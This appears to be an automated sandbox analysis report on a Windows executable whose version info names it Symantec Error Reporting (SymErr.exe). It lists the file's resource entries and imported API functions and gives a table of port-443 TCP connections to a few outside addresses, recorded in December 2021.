                            RT_ICON0xbeb800x988dataEnglishUnited States
                            RT_ICON0xbf5080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xbf9700x668dataEnglishUnited States
                            RT_ICON0xbffd80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                            RT_ICON0xc02c00x1e8dataEnglishUnited States
                            RT_ICON0xc04a80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xc05d00xea8dataEnglishUnited States
                            RT_ICON0xc14780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                            RT_ICON0xc1d200x6c8dataEnglishUnited States
                            RT_ICON0xc23e80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xc29500x25a8dataEnglishUnited States
                            RT_ICON0xc4ef80x10a8dataEnglishUnited States
                            RT_ICON0xc5fa00x988dataEnglishUnited States
                            RT_ICON0xc69280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xc6d900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                            RT_ICON0xd91b80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                            RT_ICON0xddde00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                            RT_ICON0xe20080x25a8dataEnglishUnited States
                            RT_ICON0xe45b00x10a8dataEnglishUnited States
                            RT_ICON0xe56580xeb0dataEnglishUnited States
                            RT_ICON0xe65080x988dataEnglishUnited States
                            RT_ICON0xe6e900x6b8dataEnglishUnited States
                            RT_ICON0xe75480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xe79b00x668dataEnglishUnited States
                            RT_ICON0xe80180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                            RT_ICON0xe83000x1e8dataEnglishUnited States
                            RT_ICON0xe84e80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xe86100xea8dataEnglishUnited States
                            RT_ICON0xe94b80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                            RT_ICON0xe9d600x6c8dataEnglishUnited States
                            RT_ICON0xea4280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xea9900x25a8dataEnglishUnited States
                            RT_ICON0xecf380x10a8dataEnglishUnited States
                            RT_ICON0xedfe00x988dataEnglishUnited States
                            RT_ICON0xee9680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xeedd00x668dataEnglishUnited States
                            RT_ICON0xef4380x2e8dataEnglishUnited States
                            RT_ICON0xef7200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xef8480xea8dataEnglishUnited States
                            RT_ICON0xf06f00x8a8dataEnglishUnited States
                            RT_ICON0xf0f980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xf15000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                            RT_ICON0xf5a300x25a8dataEnglishUnited States
                            RT_ICON0xf7fd80x10a8dataEnglishUnited States
                            RT_ICON0xf90800x988dataEnglishUnited States
                            RT_ICON0xf9a080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xf9e700x668dataEnglishUnited States
                            RT_ICON0xfa4d80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                            RT_ICON0xfa7c00x1e8dataEnglishUnited States
                            RT_ICON0xfa9a80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xfaad00xea8dataEnglishUnited States
                            RT_ICON0xfb9780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                            RT_ICON0xfc2200x6c8dataEnglishUnited States
                            RT_ICON0xfc8e80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xfce500x25a8dataEnglishUnited States
                            RT_ICON0xff3f80x10a8dataEnglishUnited States
                            RT_ICON0x1004a00x988dataEnglishUnited States
                            RT_ICON0x100e280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x1012900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                            RT_ICON0x1136b80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                            RT_ICON0x1182e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                            RT_ICON0x11c5080x25a8dataEnglishUnited States
                            RT_ICON0x11eab00x10a8dataEnglishUnited States
                            RT_ICON0x11fb580xeb0dataEnglishUnited States
                            RT_ICON0x120a080x988dataEnglishUnited States
                            RT_ICON0x1213900x6b8dataEnglishUnited States
                            RT_ICON0x121a480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x121eb00x668dataEnglishUnited States
                            RT_ICON0x1225180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                            RT_ICON0x1228000x1e8dataEnglishUnited States
                            RT_ICON0x1229e80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x122b100xea8dataEnglishUnited States
                            RT_ICON0x1239b80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                            RT_ICON0x1242600x6c8dataEnglishUnited States
                            RT_ICON0x1249280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x124e900x25a8dataEnglishUnited States
                            RT_ICON0x1274380x10a8dataEnglishUnited States
                            RT_ICON0x1284e00x988dataEnglishUnited States
                            RT_ICON0x128e680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x1292d00x668dataEnglishUnited States
                            RT_ICON0x1299380x2e8dataEnglishUnited States
                            RT_ICON0x129c200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x129d480xea8dataEnglishUnited States
                            RT_ICON0x12abf00x8a8dataEnglishUnited States
                            RT_ICON0x12b4980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x12ba000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                            RT_ICON0x12ff300x25a8dataEnglishUnited States
                            RT_ICON0x1324d80x10a8dataEnglishUnited States
                            RT_ICON0x1335800x988dataEnglishUnited States
                            RT_ICON0x133f080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x1343700x668dataEnglishUnited States
                            RT_ICON0x1349d80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                            RT_ICON0x134cc00x1e8dataEnglishUnited States
                            RT_ICON0x134ea80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x134fd00xea8dataEnglishUnited States
                            RT_ICON0x135e780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                            RT_ICON0x1367200x6c8dataEnglishUnited States
                            RT_ICON0x136de80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x1373500x25a8dataEnglishUnited States
                            RT_ICON0x1398f80x10a8dataEnglishUnited States
                            RT_ICON0x13a9a00x988dataEnglishUnited States
                            RT_ICON0x13b3280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x13b7900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                            RT_ICON0x14dbb80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                            RT_ICON0x1527e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                            RT_ICON0x156a080x25a8dataEnglishUnited States
                            RT_ICON0x158fb00x10a8dataEnglishUnited States
                            RT_ICON0x15a0580xeb0dataEnglishUnited States
                            RT_ICON0x15af080x988dataEnglishUnited States
                            RT_ICON0x15b8900x6b8dataEnglishUnited States
                            RT_ICON0x15bf480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x15c3b00x668dataEnglishUnited States
                            RT_ICON0x15ca180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                            RT_ICON0x15cd000x1e8dataEnglishUnited States
                            RT_ICON0x15cee80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x15d0100xea8dataEnglishUnited States
                            RT_ICON0x15deb80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                            RT_ICON0x15e7600x6c8dataEnglishUnited States
                            RT_ICON0x15ee280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x15f3900x25a8dataEnglishUnited States
                            RT_ICON0x1619380x10a8dataEnglishUnited States
                            RT_ICON0x1629e00x988dataEnglishUnited States
                            RT_ICON0x1633680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x1637d00x668dataEnglishUnited States
                            RT_ICON0x163e380x2e8dataEnglishUnited States
                            RT_ICON0x1641200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x1642480xea8dataEnglishUnited States
                            RT_ICON0x1650f00x8a8dataEnglishUnited States
                            RT_ICON0x1659980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x165f000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                            RT_ICON0x16a4300x25a8dataEnglishUnited States
                            RT_ICON0x16c9d80x10a8dataEnglishUnited States
                            RT_ICON0x16da800x988dataEnglishUnited States
                            RT_ICON0x16e4080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x16e8700x668dataEnglishUnited States
                            RT_ICON0x16eed80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                            RT_ICON0x16f1c00x1e8dataEnglishUnited States
                            RT_ICON0x16f3a80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x16f4d00xea8dataEnglishUnited States
                            RT_ICON0x1703780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                            RT_ICON0x170c200x6c8dataEnglishUnited States
                            RT_ICON0x1712e80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x1718500x25a8dataEnglishUnited States
                            RT_ICON0x173df80x10a8dataEnglishUnited States
                            RT_ICON0x174ea00x988dataEnglishUnited States
                            RT_ICON0x1758280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x175c900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                            RT_ICON0x1880b80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                            RT_ICON0x18cce00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                            RT_ICON0x190f080x25a8dataEnglishUnited States
                            RT_ICON0x1934b00x10a8dataEnglishUnited States
                            RT_ICON0x1945580xeb0dataEnglishUnited States
                            RT_ICON0x1954080x988dataEnglishUnited States
                            RT_ICON0x195d900x6b8dataEnglishUnited States
                            RT_ICON0x1964480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x1968b00x668dataEnglishUnited States
                            RT_ICON0x196f180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                            RT_ICON0x1972000x1e8dataEnglishUnited States
                            RT_ICON0x1973e80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x1975100xea8dataEnglishUnited States
                            RT_ICON0x1983b80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                            RT_ICON0x198c600x6c8dataEnglishUnited States
                            RT_ICON0x1993280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x1998900x25a8dataEnglishUnited States
                            RT_ICON0x19be380x10a8dataEnglishUnited States
                            RT_ICON0x19cee00x988dataEnglishUnited States
                            RT_ICON0x19d8680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x19dcd00x668dataEnglishUnited States
                            RT_ICON0x19e3380x2e8dataEnglishUnited States
                            RT_ICON0x19e6200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x19e7480xea8dataEnglishUnited States
                            RT_ICON0x19f5f00x8a8dataEnglishUnited States
                            RT_ICON0x19fe980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0x1a04000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                            RT_ICON0x1a49300x25a8dataEnglishUnited States
                            RT_ICON0x1a6ed80x10a8dataEnglishUnited States
                            RT_ICON0x1a7f800x988dataEnglishUnited States
                            RT_ICON0x1a89080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_GROUP_ICON0x1a8d700xaedataEnglishUnited States
                            RT_GROUP_ICON0x1a8e200x84dataEnglishUnited States
                            RT_GROUP_ICON0x1a8ea40xaedataEnglishUnited States
                            RT_GROUP_ICON0x1a8f540xa0dataEnglishUnited States
                            RT_GROUP_ICON0x1a8ff40xaedataEnglishUnited States
                            RT_GROUP_ICON0x1a90a40x84dataEnglishUnited States
                            RT_GROUP_ICON0x1a91280xaedataEnglishUnited States
                            RT_GROUP_ICON0x1a91d80xa0dataEnglishUnited States
                            RT_GROUP_ICON0x1a92780xaedataEnglishUnited States
                            RT_GROUP_ICON0x1a93280x84dataEnglishUnited States
                            RT_GROUP_ICON0x1a93ac0xaedataEnglishUnited States
                            RT_GROUP_ICON0x1a945c0xa0dataEnglishUnited States
                            RT_GROUP_ICON0x1a94fc0xaedataEnglishUnited States
                            RT_GROUP_ICON0x1a95ac0x84dataEnglishUnited States
                            RT_GROUP_ICON0x1a96300xaedataEnglishUnited States
                            RT_GROUP_ICON0x1a96e00xa0dataEnglishUnited States
                            RT_GROUP_ICON0x1a97800xaedataEnglishUnited States
                            RT_GROUP_ICON0x1a98300x84dataEnglishUnited States
                            RT_GROUP_ICON0x1a98b40xaedataEnglishUnited States
                            RT_GROUP_ICON0x1a99640xa0dataEnglishUnited States
                            RT_GROUP_ICON0x1a9a040xaedataEnglishUnited States
                            RT_GROUP_ICON0x1a9ab40x84dataEnglishUnited States
                            RT_GROUP_ICON0x1a9b380xaedataEnglishUnited States
                            RT_GROUP_ICON0x1a9be80xa0dataEnglishUnited States
                            RT_VERSION0x1a9c880x340dataEnglishUnited States
                            RT_VERSION0x1a9fc80x2f8dataEnglishUnited States
                            RT_VERSION0x1aa2c00x344dataEnglishUnited States
                            RT_VERSION0x1aa6040x318dataEnglishUnited States
                            RT_VERSION0x1aa91c0x340dataEnglishUnited States
                            RT_VERSION0x1aac5c0x2f8dataEnglishUnited States
                            RT_VERSION0x1aaf540x344dataEnglishUnited States
                            RT_VERSION0x1ab2980x318dataEnglishUnited States
                            RT_VERSION0x1ab5b00x340dataEnglishUnited States
                            RT_VERSION0x1ab8f00x2f8dataEnglishUnited States
                            RT_VERSION0x1abbe80x344dataEnglishUnited States
                            RT_VERSION0x1abf2c0x318dataEnglishUnited States
                            RT_VERSION0x1ac2440x340dataEnglishUnited States
                            RT_VERSION0x1ac5840x2f8dataEnglishUnited States
                            RT_VERSION0x1ac87c0x344dataEnglishUnited States
                            RT_VERSION0x1acbc00x318dataEnglishUnited States
                            RT_VERSION0x1aced80x340dataEnglishUnited States
                            RT_VERSION0x1ad2180x2f8dataEnglishUnited States
                            RT_VERSION0x1ad5100x344dataEnglishUnited States
                            RT_VERSION0x1ad8540x318dataEnglishUnited States
                            RT_VERSION0x1adb6c0x340dataEnglishUnited States
                            RT_VERSION0x1adeac0x2f8dataEnglishUnited States
                            RT_VERSION0x1ae1a40x344dataEnglishUnited States
                            RT_VERSION0x1ae4e80x318dataEnglishUnited States
                            RT_MANIFEST0x1ae8000x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1aef800x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1af1c80x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1af5940x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1afd7c0x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b04fc0x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b07440x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b0b100x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b12f80x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b1a780x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b1cc00x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b208c0x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b28740x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b2ff40x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b323c0x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b36080x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b3df00x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b45700x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b47b80x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b4b840x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b536c0x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b5aec0x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b5d340x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_MANIFEST0x1b61000x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States

                            Imports

                            DLLImport
                            advapi32.dllRegDeleteKeyA, RegCreateKeyExA, RegQueryValueExA, RegCloseKey, RegEnumValueA, RegSetValueExA, RegDeleteValueA, RegEnumKeyA, RegOpenKeyExA
                            comctl32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                            gdi32.dllGetDeviceCaps, SetBkColor, CreateBrushIndirect, CreateFontIndirectA, SetTextColor, SetBkMode, SelectObject, DeleteObject
                            kernel32.dllGetCommandLineA, CreateThread, LoadLibraryExA, GetFullPathNameA, SetFileAttributesA, GlobalUnlock, WaitForSingleObject, GetTempPathA, GlobalAlloc, GetTempFileNameA, VirtualProtect, GetFileAttributesA, GetProcAddress, GetSystemDirectoryA, Sleep, SearchPathA, GlobalLock, GetPrivateProfileStringA, GetDiskFreeSpaceA, GetCurrentDirectoryA, MultiByteToWideChar, MulDiv, FindClose, lstrcpynA, GetVersion, MoveFileA, SetErrorMode, GetCurrentProcess, FindFirstFileA, GetShortPathNameA, ExpandEnvironmentStringsA, SetFilePointer, GetFileSize, lstrcmpiA, FreeLibrary, GetTickCount, RemoveDirectoryA, ReadFile, CreateDirectoryA, ExitProcess, FindNextFileA, SetCurrentDirectoryA, LoadLibraryA, SetFileTime, CreateFileA, lstrlenA, lstrcmpA, GetModuleHandleA, GetModuleFileNameA, DeleteFileA, WriteFile, CloseHandle, CompareFileTime, lstrcatA, GlobalFree, GetWindowsDirectoryA, WritePrivateProfileStringA, CopyFileA, CreateProcessA, GetExitCodeProcess, GetLastError
                            ole32.dllCoTaskMemFree, OleInitialize, CoCreateInstance, OleUninitialize
                            shell32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHGetSpecialFolderLocation, ShellExecuteA, SHFileOperationA
                            user32.dllIsWindowVisible, DispatchMessageA, SendMessageTimeoutA, CreateWindowExA, GetClientRect, SetWindowPos, SystemParametersInfoA, LoadBitmapA, CharPrevA, EndPaint, DestroyWindow, EnableMenuItem, AppendMenuA, ShowWindow, SetWindowLongA, InvalidateRect, EnableWindow, OpenClipboard, EmptyClipboard, GetMessagePos, SendMessageA, ExitWindowsEx, IsWindowEnabled, BeginPaint, GetSysColor, PostQuitMessage, GetSystemMetrics, MessageBoxIndirectA, SetDlgItemTextA, EndDialog, SetClassLongA, GetDC, DefWindowProcA, CloseClipboard, GetDlgItemTextA, SetForegroundWindow, FillRect, LoadCursorA, CharNextA, IsWindow, GetSystemMenu, CreateDialogParamA, GetWindowRect, RegisterClassA, GetWindowLongA, DrawTextA, FindWindowExA, CheckDlgButton, TrackPopupMenu, wsprintfA, DialogBoxParamA, CreatePopupMenu, SetCursor, SetWindowTextA, ScreenToClient, LoadImageA, SetClipboardData

                            Exports

                            NameOrdinalAddress
                            DllRegisterServer10x1002513f

                            Version Infos

                            DescriptionData
                            LegalCopyrightCopyright 2016 Symantec Corporation. All rights reserved.
                            InternalNameSymErr
                            FileVersion7.6.2.5
                            CompanyNameSymantec Corporation
                            ProductNameSymantec Shared Component
                            ProductVersion7.6
                            FileDescriptionSymantec Error Reporting
                            OriginalFilenameSymErr.exe
                            Translation0x0409 0x04b0

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 14, 2021 10:21:27.900134087 CET49789443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:27.900198936 CET443497893.12.124.139192.168.2.6
                            Dec 14, 2021 10:21:27.900322914 CET49789443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:27.901295900 CET49789443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:27.901324987 CET443497893.12.124.139192.168.2.6
                            Dec 14, 2021 10:21:28.024019957 CET49790443192.168.2.618.219.227.107
                            Dec 14, 2021 10:21:28.024051905 CET4434979018.219.227.107192.168.2.6
                            Dec 14, 2021 10:21:28.024136066 CET49790443192.168.2.618.219.227.107
                            Dec 14, 2021 10:21:28.024764061 CET49790443192.168.2.618.219.227.107
                            Dec 14, 2021 10:21:28.024785042 CET4434979018.219.227.107192.168.2.6
                            Dec 14, 2021 10:21:28.052880049 CET443497893.12.124.139192.168.2.6
                            Dec 14, 2021 10:21:28.056920052 CET49791443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:28.057018042 CET443497913.12.124.139192.168.2.6
                            Dec 14, 2021 10:21:28.057200909 CET49791443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:28.058237076 CET49791443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:28.058257103 CET443497913.12.124.139192.168.2.6
                            Dec 14, 2021 10:21:28.123307943 CET49792443192.168.2.63.20.161.64
                            Dec 14, 2021 10:21:28.123363972 CET443497923.20.161.64192.168.2.6
                            Dec 14, 2021 10:21:28.123461962 CET49792443192.168.2.63.20.161.64
                            Dec 14, 2021 10:21:28.124365091 CET49792443192.168.2.63.20.161.64
                            Dec 14, 2021 10:21:28.124394894 CET443497923.20.161.64192.168.2.6
                            Dec 14, 2021 10:21:28.175709963 CET4434979018.219.227.107192.168.2.6
                            Dec 14, 2021 10:21:28.180037022 CET49793443192.168.2.618.219.227.107
                            Dec 14, 2021 10:21:28.180089951 CET4434979318.219.227.107192.168.2.6
                            Dec 14, 2021 10:21:28.180481911 CET49793443192.168.2.618.219.227.107
                            Dec 14, 2021 10:21:28.182934046 CET49793443192.168.2.618.219.227.107
                            Dec 14, 2021 10:21:28.182969093 CET4434979318.219.227.107192.168.2.6
                            Dec 14, 2021 10:21:28.208842039 CET443497913.12.124.139192.168.2.6
                            Dec 14, 2021 10:21:28.211349010 CET49794443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:28.211389065 CET443497943.12.124.139192.168.2.6
                            Dec 14, 2021 10:21:28.211477995 CET49794443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:28.212294102 CET49794443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:28.212321043 CET443497943.12.124.139192.168.2.6
                            Dec 14, 2021 10:21:28.275163889 CET443497923.20.161.64192.168.2.6
                            Dec 14, 2021 10:21:28.276987076 CET49795443192.168.2.63.20.161.64
                            Dec 14, 2021 10:21:28.277040005 CET443497953.20.161.64192.168.2.6
                            Dec 14, 2021 10:21:28.277153015 CET49795443192.168.2.63.20.161.64
                            Dec 14, 2021 10:21:28.278369904 CET49795443192.168.2.63.20.161.64
                            Dec 14, 2021 10:21:28.278393030 CET443497953.20.161.64192.168.2.6
                            Dec 14, 2021 10:21:28.333843946 CET4434979318.219.227.107192.168.2.6
                            Dec 14, 2021 10:21:28.335545063 CET49796443192.168.2.618.219.227.107
                            Dec 14, 2021 10:21:28.335588932 CET4434979618.219.227.107192.168.2.6
                            Dec 14, 2021 10:21:28.335671902 CET49796443192.168.2.618.219.227.107
                            Dec 14, 2021 10:21:28.336436033 CET49796443192.168.2.618.219.227.107
                            Dec 14, 2021 10:21:28.336460114 CET4434979618.219.227.107192.168.2.6
                            Dec 14, 2021 10:21:28.362796068 CET443497943.12.124.139192.168.2.6
                            Dec 14, 2021 10:21:28.364227057 CET49797443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:28.364257097 CET443497973.12.124.139192.168.2.6
                            Dec 14, 2021 10:21:28.364918947 CET49797443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:28.368439913 CET49797443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:28.368453979 CET443497973.12.124.139192.168.2.6
                            Dec 14, 2021 10:21:28.429214001 CET443497953.20.161.64192.168.2.6
                            Dec 14, 2021 10:21:28.430900097 CET49798443192.168.2.63.20.161.64
                            Dec 14, 2021 10:21:28.430928946 CET443497983.20.161.64192.168.2.6
                            Dec 14, 2021 10:21:28.431081057 CET49798443192.168.2.63.20.161.64
                            Dec 14, 2021 10:21:28.438911915 CET49798443192.168.2.63.20.161.64
                            Dec 14, 2021 10:21:28.438926935 CET443497983.20.161.64192.168.2.6
                            Dec 14, 2021 10:21:28.486751080 CET4434979618.219.227.107192.168.2.6
                            Dec 14, 2021 10:21:28.488133907 CET49799443192.168.2.618.219.227.107
                            Dec 14, 2021 10:21:28.488176107 CET4434979918.219.227.107192.168.2.6
                            Dec 14, 2021 10:21:28.488295078 CET49799443192.168.2.618.219.227.107
                            Dec 14, 2021 10:21:28.489048958 CET49799443192.168.2.618.219.227.107
                            Dec 14, 2021 10:21:28.489072084 CET4434979918.219.227.107192.168.2.6
                            Dec 14, 2021 10:21:28.518722057 CET443497973.12.124.139192.168.2.6
                            Dec 14, 2021 10:21:28.589646101 CET443497983.20.161.64192.168.2.6
                            Dec 14, 2021 10:21:28.591161013 CET49800443192.168.2.63.20.161.64
                            Dec 14, 2021 10:21:28.591188908 CET443498003.20.161.64192.168.2.6
                            Dec 14, 2021 10:21:28.591268063 CET49800443192.168.2.63.20.161.64
                            Dec 14, 2021 10:21:28.592097044 CET49800443192.168.2.63.20.161.64
                            Dec 14, 2021 10:21:28.592108965 CET443498003.20.161.64192.168.2.6
                            Dec 14, 2021 10:21:28.637002945 CET49801443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:28.637041092 CET443498013.12.124.139192.168.2.6
                            Dec 14, 2021 10:21:28.637135983 CET49801443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:28.637778997 CET49801443192.168.2.63.12.124.139
                            Dec 14, 2021 10:21:28.637794018 CET443498013.12.124.139192.168.2.6
                            Dec 14, 2021 10:21:28.639578104 CET4434979918.219.227.107192.168.2.6
